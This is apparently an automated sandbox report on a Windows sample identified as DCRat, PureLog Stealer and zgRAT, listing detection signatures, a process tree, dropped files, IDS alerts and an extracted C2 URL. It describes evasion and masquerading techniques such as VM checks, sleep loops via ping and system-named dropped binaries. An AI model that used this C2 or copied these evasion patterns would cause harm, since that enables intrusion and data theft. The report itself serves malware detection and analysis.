Edit tour

Windows Analysis Report
9D7RwuJrth.exe

Overview

General Information

Sample name:	9D7RwuJrth.exe renamed because original name is a hash value
Original sample name:	0ad0b4a4a549230e090d712b5521bd96.exe
Analysis ID:	1542977
MD5:	0ad0b4a4a549230e090d712b5521bd96
SHA1:	55690e0d976955e80f14c314efcaa34e3303a02b
SHA256:	9882ee185d8d4db2a86040b7e3c7687cef737470f2a7b5c88868e80880cbd429
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores large binary data to the registry

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

9D7RwuJrth.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\9D7RwuJrth.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 3120 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3064 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6812 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WmiPrvSE.exe (PID: 3720 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 6984 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1732 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7104 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WmiPrvSE.exe (PID: 7420 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 7644 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7696 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7712 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WmiPrvSE.exe (PID: 7744 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 8008 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\grDS520PRI.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8056 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 8072 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WmiPrvSE.exe (PID: 8104 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 2992 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5324 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 3064 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WmiPrvSE.exe (PID: 3120 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

WMIADAP.exe (PID: 7644 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)

cmd.exe (PID: 7412 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 648 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6952 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WmiPrvSE.exe (PID: 7536 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 7092 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7724 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5000 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WmiPrvSE.exe (PID: 3620 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 7508 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7616 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7632 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

WmiPrvSE.exe (PID: 4180 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 3156 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7788 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7800 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

WmiPrvSE.exe (PID: 7892 cmdline: "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe" MD5: 0AD0B4A4A549230E090D712B5521BD96)

cmd.exe (PID: 4584 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://304773cm.n9shteam.in/jscpuGamegeneratorprivate", "MUTEX": "DCR_MUTEX-ZEseCL54QGPnsao3t7iD"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
9D7RwuJrth.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
9D7RwuJrth.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1727163824.0000000000412000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1768667398.0000000012A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: 9D7RwuJrth.exe PID: 3428	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: WmiPrvSE.exe PID: 3720	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.9D7RwuJrth.exe.410000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.9D7RwuJrth.exe.410000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\9D7RwuJrth.exe, ProcessId: 3428, TargetFilename: C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T02:42:16.030508+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49730	188.114.96.3	80	TCP
2024-10-27T02:42:29.093066+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49737	188.114.96.3	80	TCP
2024-10-27T02:42:39.054409+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49738	188.114.96.3	80	TCP
2024-10-27T02:42:48.151061+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49739	188.114.96.3	80	TCP
2024-10-27T02:43:01.209944+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49752	188.114.96.3	80	TCP
2024-10-27T02:43:11.310891+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49807	188.114.96.3	80	TCP
2024-10-27T02:43:24.686845+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49883	188.114.96.3	80	TCP
2024-10-27T02:43:37.764984+0200	2048095	1	A Network Trojan was detected	192.168.2.4	49958	188.114.96.3	80	TCP
2024-10-27T02:43:48.264991+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50010	188.114.96.3	80	TCP
2024-10-27T02:44:00.765036+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50011	188.114.96.3	80	TCP
2024-10-27T02:44:10.171275+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50012	188.114.96.3	80	TCP
2024-10-27T02:44:17.936902+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50013	188.114.96.3	80	TCP
2024-10-27T02:44:41.895591+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50015	188.114.96.3	80	TCP
2024-10-27T02:44:54.124469+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50016	188.114.96.3	80	TCP
2024-10-27T02:45:01.921365+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50017	188.114.96.3	80	TCP
2024-10-27T02:45:14.187101+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50018	188.114.96.3	80	TCP
2024-10-27T02:45:22.249536+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50019	188.114.96.3	80	TCP
2024-10-27T02:45:34.484041+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50020	188.114.96.3	80	TCP
2024-10-27T02:45:42.218300+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50021	188.114.96.3	80	TCP
2024-10-27T02:45:54.452699+0200	2048095	1	A Network Trojan was detected	192.168.2.4	50022	188.114.96.3	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 9D7RwuJrth.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	Avira: detection malicious, Label: TR/AVI.Agent.hjtmb
Source: C:\Users\user\AppData\Local\Temp\9O9rrJCHDg.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Avira: detection malicious, Label: TR/AVI.Agent.hjtmb
Source: C:\Users\user\AppData\Local\Temp\FYUTXnTyLD.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\BLXo76X4ph.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Avira: detection malicious, Label: TR/AVI.Agent.hjtmb
Source: C:\Users\user\AppData\Local\Temp\KvMN3vAFGm.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\CvcPWQun.log	Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\Desktop\AEgOhmic.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\BRrXbneT.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\COJNZQhv.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\grDS520PRI.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\ANxQZOiH.log	Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Avira: detection malicious, Label: TR/AVI.Agent.hjtmb
Source: C:\Users\user\Desktop\CDLiAAVt.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\BBca1gliPd.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.1768667398.0000000012A61000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://304773cm.n9shteam.in/jscpuGamegeneratorprivate", "MUTEX": "DCR_MUTEX-ZEseCL54QGPnsao3t7iD"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	ReversingLabs: Detection: 65%
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	ReversingLabs: Detection: 65%
Source: C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe	ReversingLabs: Detection: 65%
Source: C:\Users\Default\OneDrive\qLBhpsNtheWbwIdhOeZ.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\AEgOhmic.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\ANxQZOiH.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\AVufnTwx.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\BwryKsoE.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\CDLiAAVt.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\DpMeoAtV.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\GQJohFLp.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\KMHfZCnD.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\KrawoXqF.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\LALnLPjB.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\MFWOLyZB.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\NZNelUXb.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\OPbwNHKO.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QfjBlGMR.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\QnTUQpnW.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\RngMDvMV.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\SFRmUDLH.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\STgXZIan.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TMiCdAAw.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\TcjfiIuK.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\TideCjWs.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\VNPvpVFD.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\XgJlfaRK.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\YiicOEwG.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\YrKlkCVM.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\ZELbGgFk.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ZRpBnocC.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\ZWwCXoEW.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\aOwTdXyg.log	ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Source: 9D7RwuJrth.exe	ReversingLabs: Detection: 65%
Source: 9D7RwuJrth.exe	Virustotal: Detection: 73%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\BjyqpIYV.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CvcPWQun.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CDLiAAVt.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CJLfMmRu.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9D7RwuJrth.exe

Joe Sandbox ML: detected

Source: 9D7RwuJrth.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Directory created: C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe			Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	Directory created: C:\Program Files\Windows Media Player\en-GB\6661cc8d955995			Jump to behavior

Source: 9D7RwuJrth.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WmiPrvSE.exe, 00000020.00000002.2377306205.000000001C937000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: WmiPrvSE.exe, 0000000E.00000002.2080168939.000000001C333000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb)) source: WmiPrvSE.exe, 00000020.00000002.2377306205.000000001C937000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: WmiPrvSE.exe, 00000005.00000002.1883557439.000000001B05E000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000E.00000002.2078316070.000000001C240000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.2476107167.000000001BB50000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002D.00000002.2610951731.000000001CCD6000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000033.00000002.2678331499.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000039.00000002.2976792819.000000001B7AA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Parse Translate Aliases.pdb source: WmiPrvSE.exe, 00000005.00000002.1885289399.000000001BFB0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbI#` source: WmiPrvSE.exe, 0000000E.00000002.2080168939.000000001C333000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\GameBarPresenceWriter\WmiPrvSE.PDB N source: WmiPrvSE.exe, 00000020.00000002.2373276367.000000001C86F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *rlib.pdb=R source: WmiPrvSE.exe, 00000005.00000002.1886057893.000000001C072000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\9D7RwuJrth.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49737 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49752 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49739 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49883 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49807 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49958 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50017 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50015 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:50019 -> 188.114.96.3:80
